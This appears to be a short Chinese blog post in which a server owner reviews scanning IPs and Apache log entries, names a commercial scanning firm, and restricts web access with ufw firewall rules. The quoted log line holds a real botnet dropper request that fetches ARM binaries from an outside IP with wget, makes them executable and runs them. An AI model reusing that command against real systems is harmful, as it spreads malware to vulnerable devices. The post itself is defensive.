以下为打开转发通道后发现的扫描IP

[52.167.144.236:41544]
[185.191.126.213:42380]
[220.196.160.101:26802]
[172.206.142.235:51220]
[185.224.128.74:53224]
[199.45.154.151]
[220.196.160.154:33744]
[36.46.209.105]
[104.197.141.11]

以上只是部分被我看见的IP，翻了一下/var/log/apache/other_vhosts_access.log文件，随处可见脚本小子试图爆破网站，随便摘一个。

185.224.128.83 - -  "GET /shell?cd+/tmp;rm+arm+arm5+arm7;nohup+wget+http:/\\/154.216.20.232/arm7;chmod+777+arm7;./arm7+jaws;nohup+wget+http:/\\/154.216.20.232/arm5;c>

还有一些神秘组织。

87.236.176.58

实际解析域名是internet-measurement.com，背后是driftnet.io，纯纯一随便扫描别人服务的商业公司。

这服务器上就是个纯粹的假网页，啥功能都没有，扫他图什么。

仔细一瞧，这几大堆日志里全是扫描，TMD红温了，直接ufw启动。

sudo ufw allow 22
sudo ufw enable

因为现在国内普通的nat，我的手机和电脑的对外IP反而在同一网段了，幽默的意外之喜。

现配置ufw为仅允许某网段访问。

sudo ufw allow from xxx.xxx.0.0/16 to any port 80
sudo ufw allow from xxx.xxx.0.0/16 to any port 443

注意，IPv4协议由4字节共32比特组成，/16等同于255.255.0.0，代指前两个字节指网络地址，后两个指主机地址，即代指了一个网段，常见的/24即代指前三字节为网络地址，后一为主机地址。实际情况灵活变化即可。